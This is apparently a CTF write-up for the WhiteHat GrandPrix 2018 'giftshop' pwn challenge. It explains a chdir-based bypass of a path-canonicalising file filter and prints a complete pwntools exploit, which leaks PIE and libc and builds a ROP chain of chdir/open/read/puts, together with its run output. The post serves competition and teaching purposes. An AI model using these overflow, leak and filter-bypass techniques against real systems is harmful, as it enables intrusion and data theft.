
WhiteHat GrandPrix 2018 QUAL - pwn01 (giftshop)

pwn3r_45 2018. 8. 19. 15:10

Category : pwnable


nc pwn01.grandprix.whitehatvn.com 26129

file: material.grandprix.whitehatvn.com/pwn01


forPlayer.zip



Summary : stack buffer overflow → ROP (leak PIE and libc, then chdir/open/read/puts). The system-call/filename filter that protects /home/gift/flag.txt is bypassed by calling chdir() first, so the relative path the monitor canonicalises is not the path the process actually opens.





* bypass flag filename filtering (/home/gift/flag.txt)


- default

[original]
monitor : /home/gift/
target : /home/gift/

[open('./aa/../flag.txt')]
monitor : real_path(/home/gift/./aa/../flag.txt) = /home/gift/flag.txt ( filtered!!! )
target : real_path(/home/gift/./aa/../flag.txt) = /home/gift/flag.txt
→ the filter canonicalises the path before comparing it, so `.`/`..` tricks alone do not get past it.


- after chdir('/home/')

The monitor keeps the working directory it recorded at start (/home/gift/) and does not follow the chdir, while the target process' real cwd is now /home/. A relative filename is therefore canonicalised against two different bases:

[chdir('/home/')]
monitor : /home/gift/
target : /home/

[open('gift/flag.txt')]
monitor : /home/gift/gift/flag.txt ( not filtered )
target : /home/gift/flag.txt




exploit.py

#!/usr/bin/python


from pwn import *

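# ---- stage 0: connect and pin the PIE base ----
# The binary prints one of its own addresses after "you come here !"; its
# distance from the image base (0x2030D8) is fixed, so a single leak gives PIE.
#s = process('./giftshop')
s = remote('pwn01.grandprix.whitehatvn.com', 26129)
s.recvuntil(b'you come here !\n')
pie_base = int(s.recvline().strip(), 16) - 0x2030D8
# A mis-parsed leak would otherwise be packed straight into the ROP chain;
# an image base is always page-aligned, so reject anything else up front.
if pie_base & 0xfff:
    raise ValueError('bad PIE leak: 0x%x' % pie_base)
print(hex(pie_base))

# Binary-relative offsets (PIE). Taken from the released pwn01 binary and
# only valid for that file.
puts_plt = pie_base + 0xB40
puts_got = pie_base + 0x203038
pop_rdi = pie_base + 0x000000000000225f   # pop rdi ; ret
pop_rsi = pie_base + 0x0000000000002261   # pop rsi ; ret
pop_rdx = pie_base + 0x0000000000002265   # pop rdx ; ret
main_addr = pie_base + 0x00DA0
# Writable scratch inside the binary's data area (presumably .bss) where the
# flag bytes are read() to before being printed.
freespace = pie_base + 0x203200

# ---- stage 1: first overflow -> puts(GOT[puts]) to leak libc, then back to main ----
s.recvuntil(b'plzz ??\n')
s.sendline(b'12345')
s.recvuntil(b'plzz: \n')
s.sendline(b'12345')
s.recvuntil(b'Your choice:\n')
# 24 bytes reach the saved return address. The line starts with "1\x00" so the
# menu still sees a valid choice (the choice appears to be parsed from the same
# buffer -- confirm in the binary); the rest of the line is the chain.
pay = b'1\x00'.ljust(24, b'a')
pay += p64(pop_rdi) + p64(puts_got)       # puts(GOT[puts])
pay += p64(puts_plt)
pay += p64(main_addr)                     # run main again for the 2nd overflow
s.sendline(pay)

# puts() prints the 6 significant bytes of the GOT entry; pad back to 8.
leak = s.recvline().strip()
libc_base = u64(leak.ljust(8, b'\x00')) - 0x6f690   # offset of puts in the task libc
if libc_base & 0xfff:
    raise ValueError('bad libc leak: %r' % leak)
print(hex(libc_base))

# libc-relative offsets, resolved in gdb against the libc the task runs with
# (re-derive them if a different libc is provided):
#   gdb-peda$ p open  ->  0xf7030 <open64>
#   gdb-peda$ p read  ->  0xf7250 <read>
libc_open = libc_base + 0xf7030
libc_read = libc_base + 0xf7250
libc_chdir = libc_base + 0xf7a90

# The second "plzz:" input is stored at pie_base+0x203120, so it doubles as
# storage for the two strings the chain needs: "/home/" at +8 and
# "./gift/flag.txt" at +16 (each NUL-terminated, see the sendline below).
fake_dir = pie_base + 0x203120 + 8
filename = pie_base + 0x203120 + 8 + 8

# open() is assumed to hand back fd 4 (0-3 already in use in the challenge's
# environment); a wrong guess makes read() pull from some other descriptor,
# so confirm locally if the flag does not come back.
FLAG_FD = 4

# ---- stage 2: second overflow -> chdir("/home/"), open, read, puts ----
s.recvuntil(b'you come here !\n')
s.recvline()                              # the address leak again; not needed
s.recvuntil(b'plzz ??\n')
s.sendline(b'12345')
s.recvuntil(b'plzz: \n')
s.sendline(b'1234567\x00/home/\x00\x00./gift/flag.txt\x00')
s.recvuntil(b'Your choice:\n')
pay = b'1\x00'.ljust(24, b'a')
# chdir("/home/"): the monitor keeps resolving filenames against the cwd it
# recorded at start (/home/gift/), so from here "./gift/flag.txt" looks like
# /home/gift/gift/flag.txt to the filter but is /home/gift/flag.txt for us.
pay += p64(pop_rdi) + p64(fake_dir) + p64(libc_chdir)
# open("./gift/flag.txt", O_RDONLY)
pay += p64(pop_rdi) + p64(filename) + p64(pop_rsi) + p64(0) + p64(libc_open)
# read(FLAG_FD, freespace, 100)
pay += p64(pop_rdi) + p64(FLAG_FD) + p64(pop_rsi) + p64(freespace)
pay += p64(pop_rdx) + p64(100) + p64(libc_read)
# puts(freespace) -> the flag
pay += p64(pop_rdi) + p64(freespace) + p64(puts_plt)
s.sendline(pay)

s.interactive()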



$ python exploit.py
[+] Opening connection to pwn01.grandprix.whitehatvn.com on port 26129: Done
0x557bb602b000
0x7f6d1e22e000
[*] Switching to interactive mode
WhiteHat{??????????????????????????????????}